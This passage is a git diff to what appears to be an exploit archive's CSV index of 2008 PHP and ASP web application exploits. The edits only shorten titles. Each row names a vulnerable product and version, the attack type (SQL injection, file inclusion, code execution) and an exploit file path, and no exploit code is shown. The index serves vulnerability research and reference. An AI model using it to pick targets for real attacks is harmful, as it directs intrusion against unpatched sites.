Underground",php,webapps,0 6567,platforms/php/webapps/6567.pl,"Libra PHP File Manager 1.18/2.0 - Local File Inclusion",2008-09-25,Pepelux,php,webapps,0 6568,platforms/php/webapps/6568.txt,"PHP infoBoard 7 - Plus Insecure Cookie Handling",2008-09-25,Stack,php,webapps,0 @@ -20312,32 +20313,32 @@ id,file,description,date,author,platform,type,port 6572,platforms/php/webapps/6572.txt,"Atomic Photo Album 1.1.0pre4 - Cross-Site Scripting / SQL Injection",2008-09-25,d3v1l,php,webapps,0 6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - 'FCKeditor' Arbitrary File Upload",2008-09-25,Stack,php,webapps,0 6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection",2008-09-26,Stack,php,webapps,0 -6575,platforms/php/webapps/6575.txt,"barcodegen 2.0.0 - 'class_dir' Parameter Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0 -6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - 'Category' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 -6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL - 'id' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 -6578,platforms/php/webapps/6578.txt,"212Cafe Board 0.07 - 'qID' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 +6575,platforms/php/webapps/6575.txt,"barcodegen 2.0.0 - 'class_dir' Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0 +6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - 'Category' SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 +6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL - 'id' SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 +6578,platforms/php/webapps/6578.txt,"212Cafe Board 0.07 - 'qID' SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 6579,platforms/php/webapps/6579.txt,"Libra PHP File Manager 1.18 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0 6580,platforms/php/webapps/6580.txt,"Atomic Photo Album 1.1.0pre4 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0 6583,platforms/php/webapps/6583.txt,"Esqlanelapse Software Project 2.6.2 - Insecure Cookie Handling",2008-09-26,ZoRLu,php,webapps,0 6584,platforms/php/webapps/6584.txt,"The Gemini Portal 4.7 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 6585,platforms/php/webapps/6585.txt,"openEngine 2.0 beta2 - Remote File Inclusion",2008-09-26,Crackers_Child,php,webapps,0 6586,platforms/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 -6587,platforms/php/webapps/6587.txt,"The Gemini Portal 4.7 - 'lang' Parameter Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0 -6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - 'showtopic' Parameter SQL Injection",2008-09-26,0x90,php,webapps,0 -6590,platforms/php/webapps/6590.txt,"ASPapp Knowledge Base - 'CatId' Parameter SQL Injection (2)",2008-09-27,Crackers_Child,php,webapps,0 +6587,platforms/php/webapps/6587.txt,"The Gemini Portal 4.7 - 'lang' Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0 +6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - 'showtopic' SQL Injection",2008-09-26,0x90,php,webapps,0 +6590,platforms/php/webapps/6590.txt,"ASPapp Knowledge Base - 'CatId' SQL Injection (2)",2008-09-27,Crackers_Child,php,webapps,0 6591,platforms/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,php,webapps,0 6592,platforms/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion",2008-09-27,NoGe,php,webapps,0 6593,platforms/php/webapps/6593.txt,"Vbgooglemap Hotspot Edition 1.0.3 - SQL Injection",2008-09-27,elusiven,php,webapps,0 6594,platforms/php/webapps/6594.txt,"Camera Life 2.6.2b4 - Arbitrary File Upload",2008-09-27,Mi4night,php,webapps,0 6595,platforms/php/webapps/6595.txt,"Joovili 3.0 - Multiple SQL Injections",2008-09-27,~!Dok_tOR!~,php,webapps,0 6596,platforms/php/webapps/6596.txt,"E-Uploader Pro 1.0 - Multiple SQL Injections",2008-09-27,~!Dok_tOR!~,php,webapps,0 -6598,platforms/php/webapps/6598.txt,"CoAST 0.95 - 'sections_file' Parameter Remote File Inclusion",2008-09-27,DaRkLiFe,php,webapps,0 -6599,platforms/php/webapps/6599.txt,"Real Estate Manager 1.01 - 'cat_id' Parameter SQL Injection",2008-09-27,CraCkEr,php,webapps,0 -6601,platforms/php/webapps/6601.txt,"LnBlog 0.9.0 - 'plugin' Parameter Local File Inclusion",2008-09-27,dun,php,webapps,0 -6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 - 'navi' Parameter Local File Inclusion",2008-09-27,dun,php,webapps,0 -6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 - 'id' Parameter SQL Injection",2008-09-27,r45c4l,php,webapps,0 -6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 - 'path' Parameter Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0 -6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 - 'catid' Parameter SQL Injection",2008-09-27,InjEctOr5,php,webapps,0 +6598,platforms/php/webapps/6598.txt,"CoAST 0.95 - 'sections_file' Remote File Inclusion",2008-09-27,DaRkLiFe,php,webapps,0 +6599,platforms/php/webapps/6599.txt,"Real Estate Manager 1.01 - 'cat_id' SQL Injection",2008-09-27,CraCkEr,php,webapps,0 +6601,platforms/php/webapps/6601.txt,"LnBlog 0.9.0 - 'plugin' Local File Inclusion",2008-09-27,dun,php,webapps,0 +6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 - 'navi' Local File Inclusion",2008-09-27,dun,php,webapps,0 +6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 - 'id' SQL Injection",2008-09-27,r45c4l,php,webapps,0 +6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 - 'path' Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0 +6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 - 'catid' SQL Injection",2008-09-27,InjEctOr5,php,webapps,0 6606,platforms/php/webapps/6606.txt,"Yoxel 1.23beta - 'itpm_estimate.php' Remote Code Execution",2008-09-27,dun,php,webapps,0 6607,platforms/php/webapps/6607.txt,"X7 Chat 2.0.1A1 - Local File Inclusion",2008-09-27,JIKO,php,webapps,0 6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - 'bannerclick.php' SQL Injection",2008-09-28,"Hussin X",php,webapps,0 @@ -20345,73 +20346,73 @@ id,file,description,date,author,platform,type,port 6611,platforms/php/webapps/6611.php,"PHPcounter 1.3.2 - 'index.php' SQL Injection",2008-09-28,StAkeR,php,webapps,0 6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps,0 6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php' SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0 -6617,platforms/php/webapps/6617.txt,"BbZL.php 0.92 - 'lien_2' Parameter Local Directory Traversal",2008-09-28,JIKO,php,webapps,0 +6617,platforms/php/webapps/6617.txt,"BbZL.php 0.92 - 'lien_2' Local Directory Traversal",2008-09-28,JIKO,php,webapps,0 6618,platforms/php/webapps/6618.txt,"Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal",2008-09-28,Cr@zy_King,php,webapps,0 -6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks - 'linkid' Parameter SQL Injection",2008-09-28,boom3rang,php,webapps,0 +6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks - 'linkid' SQL Injection",2008-09-28,boom3rang,php,webapps,0 6621,platforms/php/webapps/6621.txt,"BbZL.php 0.92 - Insecure Cookie Handling",2008-09-28,Stack,php,webapps,0 6623,platforms/php/webapps/6623.txt,"events Calendar 1.1 - Remote File Inclusion",2008-09-29,"k3vin mitnick",php,webapps,0 -6624,platforms/php/webapps/6624.txt,"Arcadem Pro - 'articlecat' Parameter SQL Injection",2008-09-29,"Hussin X",php,webapps,0 +6624,platforms/php/webapps/6624.txt,"Arcadem Pro - 'articlecat' SQL Injection",2008-09-29,"Hussin X",php,webapps,0 6625,platforms/php/webapps/6625.txt,"Post Comments 3.0 - Insecure Cookie Handling",2008-09-29,Crackers_Child,php,webapps,0 6626,platforms/php/webapps/6626.txt,"PG Matchmaking Script - Multiple SQL Injections",2008-09-29,"Super Cristal",php,webapps,0 6628,platforms/php/webapps/6628.txt,"ArabCMS - 'rss.php' Local File Inclusion",2008-09-29,JIKO,php,webapps,0 -6629,platforms/php/webapps/6629.txt,"FAQ Management Script - 'catid' Parameter SQL Injection",2008-09-30,"Hussin X",php,webapps,0 +6629,platforms/php/webapps/6629.txt,"FAQ Management Script - 'catid' SQL Injection",2008-09-30,"Hussin X",php,webapps,0 6631,platforms/php/webapps/6631.txt,"SG Real Estate Portal 2.0 - Blind SQL Injection / Local File Inclusion",2008-09-30,SirGod,php,webapps,0 -6632,platforms/php/webapps/6632.txt,"MiNBank 1.5.0 - Multiple Remote File Inclusion",2008-09-30,DaRkLiFe,php,webapps,0 +6632,platforms/php/webapps/6632.txt,"MiNBank 1.5.0 - Multiple Remote File Inclusions",2008-09-30,DaRkLiFe,php,webapps,0 6633,platforms/php/webapps/6633.txt,"eFront 3.5.1 / build 2710 - Arbitrary File Upload",2008-09-30,Pepelux,php,webapps,0 6634,platforms/php/webapps/6634.php,"SG Real Estate Portal 2.0 - Blind SQL Injection",2008-09-30,Stack,php,webapps,0 6635,platforms/php/webapps/6635.txt,"SG Real Estate Portal 2.0 - Insecure Cookie Handling",2008-09-30,Stack,php,webapps,0 6636,platforms/php/webapps/6636.txt,"Rianxosencabos CMS 0.9 - Blind SQL Injection",2008-09-30,ka0x,php,webapps,0 -6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script - 'id' Parameter SQL Injection",2008-09-30,"Hussin X",php,webapps,0 +6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script - 'id' SQL Injection",2008-09-30,"Hussin X",php,webapps,0 6639,platforms/php/webapps/6639.txt,"Pritlog 0.4 - 'Filename' Remote File Disclosure",2008-09-30,Pepelux,php,webapps,0 6640,platforms/php/webapps/6640.pl,"ADN Forum 1.0b - Blind SQL Injection",2008-10-01,StAkeR,php,webapps,0 6641,platforms/php/webapps/6641.txt,"MySQL Quick Admin 1.5.5 - 'cookie' Local File Inclusion",2008-10-01,JosS,php,webapps,0 -6642,platforms/php/webapps/6642.txt,"BMForum 5.6 - 'tagname' Parameter SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0 +6642,platforms/php/webapps/6642.txt,"BMForum 5.6 - 'tagname' SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0 6643,platforms/php/webapps/6643.txt,"Discussion Forums 2k 3.3 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,php,webapps,0 6644,platforms/php/webapps/6644.txt,"Noname CMS 1.0 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,php,webapps,0 -6645,platforms/php/webapps/6645.txt,"Crux Gallery 1.32 - 'theme' Parameter Local File Inclusion",2008-10-01,StAkeR,php,webapps,0 +6645,platforms/php/webapps/6645.txt,"Crux Gallery 1.32 - 'theme' Local File Inclusion",2008-10-01,StAkeR,php,webapps,0 6646,platforms/php/webapps/6646.php,"phpScheduleIt 1.2.10 - 'reserve.php' Remote Code Execution",2008-10-01,EgiX,php,webapps,0 -6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - 'file_op' Parameter Remote File Inclusion",2008-10-01,Kad,php,webapps,0 +6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - 'file_op' Remote File Inclusion",2008-10-01,Kad,php,webapps,0 6649,platforms/php/webapps/6649.txt,"phpscripts Ranking Script - Insecure Cookie Handling",2008-10-01,Crackers_Child,php,webapps,0 -6650,platforms/php/webapps/6650.txt,"Link Trader - 'lnkid' Parameter SQL Injection",2008-10-01,"Hussin X",php,webapps,0 +6650,platforms/php/webapps/6650.txt,"Link Trader - 'lnkid' SQL Injection",2008-10-01,"Hussin X",php,webapps,0 6652,platforms/php/webapps/6652.txt,"Bux.to Clone Script - Insecure Cookie Handling",2008-10-02,SirGod,php,webapps,0 -6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - 'infile' Parameter Local File Inclusion",2008-10-02,ZeN,php,webapps,0 -6655,platforms/php/webapps/6655.php,"OpenX 2.6 - 'bannerid' Parameter Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0 +6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - 'infile' Local File Inclusion",2008-10-02,ZeN,php,webapps,0 +6655,platforms/php/webapps/6655.php,"OpenX 2.6 - 'bannerid' Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0 6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php' SQL Injection",2008-10-03,"Hussin X",php,webapps,0 6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0 -6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - 'skin' Parameter Local File Inclusion",2008-10-03,SirGod,php,webapps,0 +6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - 'skin' Local File Inclusion",2008-10-03,SirGod,php,webapps,0 6664,platforms/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0 6667,platforms/php/webapps/6667.txt,"pPIM 1.01 - 'notes.php' Local File Inclusion",2008-10-04,JosS,php,webapps,0 -6669,platforms/php/webapps/6669.txt,"JMweb - 'src' Parameter Local File Inclusion",2008-10-04,SirGod,php,webapps,0 +6669,platforms/php/webapps/6669.txt,"JMweb - 'src' Local File Inclusion",2008-10-04,SirGod,php,webapps,0 6670,platforms/php/webapps/6670.txt,"FOSS Gallery Admin 1.0 - Arbitrary File Upload",2008-10-04,Pepelux,php,webapps,0 6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public 1.0 - Arbitrary File Upload",2008-10-05,JosS,php,webapps,0 6675,platforms/php/webapps/6675.pl,"Galerie 3.2 - 'pic' WBB Lite Addon Blind SQL Injection",2008-10-05,J0hn.X3r,php,webapps,0 6676,platforms/php/webapps/6676.txt,"OpenNMS < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0 -6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - 'id' Parameter SQL Injection",2008-10-05,Piker,php,webapps,0 +6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - 'id' SQL Injection",2008-10-05,Piker,php,webapps,0 6678,platforms/php/webapps/6678.txt,"Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection",2008-10-05,~!Dok_tOR!~,php,webapps,0 6679,platforms/php/webapps/6679.txt,"phpAbook 0.8.8b - 'cookie' Local File Inclusion",2008-10-05,JosS,php,webapps,0 6680,platforms/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC)",2008-10-05,Pepelux,php,webapps,0 -6681,platforms/php/webapps/6681.txt,"PHP-Fusion Mod manuals - 'manual' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0 -6682,platforms/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel - 'INFO_RAID_ID' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0 -6683,platforms/php/webapps/6683.txt,"PHP-Fusion Mod recept - 'kat_id' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0 -6684,platforms/php/webapps/6684.txt,"PHP-Fusion Mod triscoop_race_system - 'raceid' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0 -6685,platforms/php/webapps/6685.txt,"asiCMS alpha 0.208 - Multiple Remote File Inclusion",2008-10-06,NoGe,php,webapps,0 +6681,platforms/php/webapps/6681.txt,"PHP-Fusion Mod manuals - 'manual' SQL Injection",2008-10-05,boom3rang,php,webapps,0 +6682,platforms/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel - 'INFO_RAID_ID' SQL Injection",2008-10-05,boom3rang,php,webapps,0 +6683,platforms/php/webapps/6683.txt,"PHP-Fusion Mod recept - 'kat_id' SQL Injection",2008-10-05,boom3rang,php,webapps,0 +6684,platforms/php/webapps/6684.txt,"PHP-Fusion Mod triscoop_race_system - 'raceid' SQL Injection",2008-10-05,boom3rang,php,webapps,0 +6685,platforms/php/webapps/6685.txt,"asiCMS alpha 0.208 - Multiple Remote File Inclusions",2008-10-06,NoGe,php,webapps,0 6687,platforms/php/webapps/6687.pl,"Yerba SACphp 6.3 - Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 6691,platforms/php/webapps/6691.txt,"Yerba SACphp 6.3 - Multiple Vulnerabilities",2008-10-07,StAkeR,php,webapps,0 6692,platforms/php/webapps/6692.txt,"Joomla! Component com_hotspots - SQL Injection",2008-10-07,cOndemned,php,webapps,0 6693,platforms/php/webapps/6693.txt,"Yourownbux 4.0 - 'cookie' SQL Injection",2008-10-07,Tec-n0x,php,webapps,0 -6694,platforms/php/webapps/6694.txt,"PHP Realtor 1.5 - 'v_cat' Parameter SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 -6695,platforms/php/webapps/6695.txt,"PHP Auto Dealer 2.7 - 'v_cat' Parameter SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 -6696,platforms/php/webapps/6696.txt,"PHP Autos 2.9.1 - 'catid' Parameter SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 +6694,platforms/php/webapps/6694.txt,"PHP Realtor 1.5 - 'v_cat' SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 +6695,platforms/php/webapps/6695.txt,"PHP Auto Dealer 2.7 - 'v_cat' SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 +6696,platforms/php/webapps/6696.txt,"PHP Autos 2.9.1 - 'catid' SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 6697,platforms/php/webapps/6697.txt,"Built2Go PHP Realestate 1.5 - 'event_detail.php' SQL Injection",2008-10-07,d3v1l,php,webapps,0 6698,platforms/php/webapps/6698.txt,"TorrentTrader Classic 1.04 - Blind SQL Injection",2008-10-07,BazOka-HaCkEr,php,webapps,0 6700,platforms/php/webapps/6700.txt,"DFF PHP Framework API - 'Data Feed File' Remote File Inclusion",2008-10-08,GoLd_M,php,webapps,0 6701,platforms/php/webapps/6701.txt,"HispaH textlinksads - 'index.php' SQL Injection",2008-10-08,InjEctOr5,php,webapps,0 -6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 - 'campaignId' Parameter SQL Injection",2008-10-08,SuB-ZeRo,php,webapps,0 +6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 - 'campaignId' SQL Injection",2008-10-08,SuB-ZeRo,php,webapps,0 6703,platforms/php/webapps/6703.txt,"WebBiscuits Modules Controller 1.1 - Remote File Inclusion / Remote File Disclosure",2008-10-08,GoLd_M,php,webapps,0 6706,platforms/php/webapps/6706.php,"Kusaba 1.0.4 - Remote Code Execution (1)",2008-10-09,Sausage,php,webapps,0 6707,platforms/php/webapps/6707.txt,"GForge 4.5.19 - Multiple SQL Injections",2008-10-09,beford,php,webapps,0 -6708,platforms/php/webapps/6708.txt,"Gforge 4.6 rc1 - 'skill_edit' Parameter SQL Injection",2008-10-09,beford,php,webapps,0 +6708,platforms/php/webapps/6708.txt,"Gforge 4.6 rc1 - 'skill_edit' SQL Injection",2008-10-09,beford,php,webapps,0 6709,platforms/php/webapps/6709.txt,"Joomla! Component Joomtracker 1.01 - SQL Injection",2008-10-09,rsauron,php,webapps,0 6710,platforms/php/webapps/6710.txt,"Camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting",2008-10-09,BackDoor,php,webapps,0 6711,platforms/php/webapps/6711.htm,"Kusaba 1.0.4 - Remote Code Execution (2)",2008-10-09,Sausage,php,webapps,0 @@ -20419,74 +20420,74 @@ id,file,description,date,author,platform,type,port 6713,platforms/php/webapps/6713.txt,"Scriptsez Mini Hosting Panel - 'members.php' Local File Inclusion",2008-10-09,JosS,php,webapps,0 6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 - (SQL Injection) User Credentials Disclosure",2008-10-09,gnix,php,webapps,0 6715,platforms/php/webapps/6715.txt,"Scriptsez Easy Image Downloader - Local File Download",2008-10-09,JosS,php,webapps,0 -6720,platforms/asp/webapps/6720.txt,"Ayco Okul Portali - 'linkid' Parameter SQL Injection",2008-10-10,Crackers_Child,asp,webapps,0 +6720,platforms/asp/webapps/6720.txt,"Ayco Okul Portali - 'linkid' SQL Injection",2008-10-10,Crackers_Child,asp,webapps,0 6721,platforms/php/webapps/6721.txt,"Easynet4u Forum Host - 'forum.php' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0 6722,platforms/php/webapps/6722.txt,"Easynet4u faq Host - 'faq.php' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0 6723,platforms/php/webapps/6723.txt,"Joomla! Component Ignite Gallery 0.8.3 - SQL Injection",2008-10-10,H!tm@N,php,webapps,0 6724,platforms/php/webapps/6724.txt,"Joomla! Component mad4Joomla! - SQL Injection",2008-10-10,H!tm@N,php,webapps,0 -6725,platforms/asp/webapps/6725.txt,"MunzurSoft Wep Portal W3 - 'kat' Parameter SQL Injection",2008-10-10,LUPUS,asp,webapps,0 -6728,platforms/php/webapps/6728.txt,"Easynet4u Link Host - 'cat_id' Parameter SQL Injection",2008-10-10,BeyazKurt,php,webapps,0 +6725,platforms/asp/webapps/6725.txt,"MunzurSoft Wep Portal W3 - 'kat' SQL Injection",2008-10-10,LUPUS,asp,webapps,0 +6728,platforms/php/webapps/6728.txt,"Easynet4u Link Host - 'cat_id' SQL Injection",2008-10-10,BeyazKurt,php,webapps,0 6729,platforms/php/webapps/6729.php,"SlimCMS 1.0.0 - 'redirect.php' Privilege Escalation",2008-10-10,StAkeR,php,webapps,0 -6730,platforms/php/webapps/6730.txt,"Joomla! Component ownbiblio 1.5.3 - 'catid' Parameter SQL Injection",2008-10-11,H!tm@N,php,webapps,0 +6730,platforms/php/webapps/6730.txt,"Joomla! Component ownbiblio 1.5.3 - 'catid' SQL Injection",2008-10-11,H!tm@N,php,webapps,0 6731,platforms/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 - 'xlacomments.asp' SQL Injection",2008-10-11,Hakxer,asp,webapps,0 6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 - File Disclosure / Code Execution",2008-10-12,muuratsalo,php,webapps,0 6734,platforms/php/webapps/6734.txt,"mini-pub 0.3 - Local Directory Traversal / File Disclosure",2008-10-12,GoLd_M,php,webapps,0 6735,platforms/php/webapps/6735.php,"Globsy 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0 -6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 - 'cat' Parameter SQL Injection",2008-10-12,Hakxer,php,webapps,0 +6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 - 'cat' SQL Injection",2008-10-12,Hakxer,php,webapps,0 6737,platforms/php/webapps/6737.txt,"LokiCMS 0.3.4 - 'index.php' Arbitrary Check File Exploit",2008-10-12,JosS,php,webapps,0 6739,platforms/php/webapps/6739.txt,"NewLife Blogger 3.0 - Insecure Cookie Handling / SQL Injection",2008-10-12,Pepelux,php,webapps,0 6740,platforms/php/webapps/6740.txt,"My PHP Indexer 1.0 - 'index.php' Local File Download",2008-10-12,JosS,php,webapps,0 6743,platforms/php/webapps/6743.pl,"LokiCMS 0.3.4 - 'writeconfig()' Remote Command Execution",2008-10-13,girex,php,webapps,0 6744,platforms/php/webapps/6744.txt,"LokiCMS 0.3.4 - 'admin.php' Create Local File Inclusion",2008-10-13,JosS,php,webapps,0 6745,platforms/php/webapps/6745.txt,"ParsBlogger - 'links.asp' SQL Injection",2008-10-13,"Hussin X",php,webapps,0 -6746,platforms/php/webapps/6746.txt,"IndexScript 3.0 - 'parent_id' Parameter SQL Injection",2008-10-13,d3v1l,php,webapps,0 +6746,platforms/php/webapps/6746.txt,"IndexScript 3.0 - 'parent_id' SQL Injection",2008-10-13,d3v1l,php,webapps,0 6747,platforms/php/webapps/6747.php,"WordPress Plugin WP Comment Remix 1.4.3 - SQL Injection",2008-10-14,g30rg3_x,php,webapps,0 6748,platforms/php/webapps/6748.txt,"XOOPS Module xhresim - SQL Injection",2008-10-14,EcHoLL,php,webapps,0 6749,platforms/php/webapps/6749.php,"Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities",2008-10-14,"Charles Fol",php,webapps,0 6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0 -6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'id' Parameter SQL Injection",2008-10-14,Hakxer,php,webapps,0 +6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'id' SQL Injection",2008-10-14,Hakxer,php,webapps,0 6755,platforms/php/webapps/6755.php,"PHPWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps,0 -6758,platforms/php/webapps/6758.txt,"AstroSPACES 1.1.1 - 'id' Parameter SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0 +6758,platforms/php/webapps/6758.txt,"AstroSPACES 1.1.1 - 'id' SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0 6759,platforms/php/webapps/6759.txt,"mystats - 'hits.php' Multiple Vulnerabilities",2008-10-15,JosS,php,webapps,0 -6760,platforms/php/webapps/6760.txt,"myEvent 1.6 - 'eventdate' Parameter SQL Injection",2008-10-15,JosS,php,webapps,0 +6760,platforms/php/webapps/6760.txt,"myEvent 1.6 - 'eventdate' SQL Injection",2008-10-15,JosS,php,webapps,0 6762,platforms/php/webapps/6762.txt,"CafeEngine - Multiple SQL Injections",2008-10-16,0xFFFFFF,php,webapps,0 -6763,platforms/php/webapps/6763.txt,"Mosaic Commerce - 'cid' Parameter SQL Injection",2008-10-16,"Ali Abbasi",php,webapps,0 +6763,platforms/php/webapps/6763.txt,"Mosaic Commerce - 'cid' SQL Injection",2008-10-16,"Ali Abbasi",php,webapps,0 6764,platforms/php/webapps/6764.php,"Mic_blog 0.0.3 - SQL Injection / Privilege Escalation",2008-10-16,StAkeR,php,webapps,0 6765,platforms/php/webapps/6765.txt,"IP Reg 0.4 - Multiple SQL Injections",2008-10-16,JosS,php,webapps,0 6766,platforms/php/webapps/6766.txt,"PokerMax Poker League 0.13 - Insecure Cookie Handling",2008-10-16,DaRkLiFe,php,webapps,0 6767,platforms/php/webapps/6767.txt,"Kure 0.6.3 - 'index.php' Local File Inclusion",2008-10-16,JosS,php,webapps,0 6768,platforms/php/webapps/6768.txt,"Mantis Bug Tracker 1.1.3 - Remote Code Execution",2008-10-16,EgiX,php,webapps,0 6769,platforms/php/webapps/6769.pl,"iGaming CMS 2.0 Alpha 1 - 'search.php' SQL Injection",2008-10-16,StAkeR,php,webapps,0 -6770,platforms/php/webapps/6770.txt,"PHP Easy Downloader 1.5 - 'file' Parameter File Disclosure",2008-10-16,LMaster,php,webapps,0 +6770,platforms/php/webapps/6770.txt,"PHP Easy Downloader 1.5 - 'file' File Disclosure",2008-10-16,LMaster,php,webapps,0 6771,platforms/cgi/webapps/6771.txt,"Calendars for the Web 4.02 - Admin Authentication Bypass",2008-10-16,SecVuln,cgi,webapps,0 -6772,platforms/php/webapps/6772.txt,"Post Affiliate Pro 2.0 - 'md' Parameter Local File Inclusion",2008-10-16,ZeN,php,webapps,0 +6772,platforms/php/webapps/6772.txt,"Post Affiliate Pro 2.0 - 'md' Local File Inclusion",2008-10-16,ZeN,php,webapps,0 6777,platforms/php/webapps/6777.txt,"WordPress Plugin st_newsletter - 'stnl_iframe.php' SQL Injection",2008-10-17,r45c4l,php,webapps,0 6778,platforms/php/webapps/6778.pl,"XOOPS Module GesGaleri - SQL Injection",2008-10-18,EcHoLL,php,webapps,0 6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 - Insecure Cookie Handling",2008-10-18,Qabandi,php,webapps,0 -6780,platforms/php/webapps/6780.txt,"zeeproperty - 'adid' Parameter SQL Injection",2008-10-18,"Hussin X",php,webapps,0 +6780,platforms/php/webapps/6780.txt,"zeeproperty - 'adid' SQL Injection",2008-10-18,"Hussin X",php,webapps,0 6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection",2008-10-18,Xianur0,php,webapps,0 6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - 'del.php' Blind SQL Injection",2008-10-18,StAkeR,php,webapps,0 6783,platforms/php/webapps/6783.php,"Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload",2008-10-18,EgiX,php,webapps,0 6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader 1.5 - Remote File Creation",2008-10-18,StAkeR,php,webapps,0 6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite - 'init.php' Remote File Inclusion",2008-10-19,NoGe,php,webapps,0 -6788,platforms/php/webapps/6788.txt,"Yappa-ng 